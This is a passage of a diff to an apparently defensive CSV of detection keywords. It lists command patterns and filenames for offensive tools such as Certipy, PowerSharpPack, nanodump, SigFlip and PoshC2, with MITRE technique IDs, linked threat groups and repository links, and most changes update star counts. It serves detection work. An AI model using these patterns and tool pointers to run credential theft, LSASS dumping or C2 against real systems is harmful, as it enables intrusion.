TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" -"* shadow auto -u * -p * -account *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"* shadow auto -u * -p * -account *","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" "* SharpC2*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" -"* -SharpChromium *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"* -SharpDPAPI -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* -SharpChromium *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* -SharpDPAPI -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" "* SharpEfsPotato*","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","0","N/A","10","3","241","40","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" -"* -SharPersist *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* -SharPersist *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" "* SharpRDPHijack*","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/bohops/SharpRDPHijack","1","0","N/A","10","4","382","84","2021-07-25T17:36:01Z","2020-07-06T02:59:46Z" -"* -SharpShares *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"* -SharpSniper *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"* SharpSocks *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"* -SharpSpray *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"* -SharpUp -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"* -Sharpview *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"* -sharpweb -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* -SharpShares *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* -SharpSniper *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* SharpSocks *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"* -SharpSpray *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* -SharpUp -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* -Sharpview *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* -sharpweb -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" "* --shell tcsh exegol*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* --shellcode *","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","POST Exploitation tools","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","1","69","16","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z" "* --shellcode *--dc-ip *","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" "* --shellcode *--silent*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" "* --shellcode --remoteinject*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" "* shodan-api.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* --show passwd*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* --show passwd*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "* --show_invalid_creds*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" "* --shtinkering*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" -"* sigflip.*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"* sigflip.c *","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"* SigFlip.exe*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"* SigFlip.PE*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"* sigflip.x64.*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"* sigflip.x86.*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"* SigLoader *","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"* --sign-domain *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"* --sign-steal *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* sigflip.*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"* sigflip.c *","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"* SigFlip.exe*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"* SigFlip.PE*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"* sigflip.x64.*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 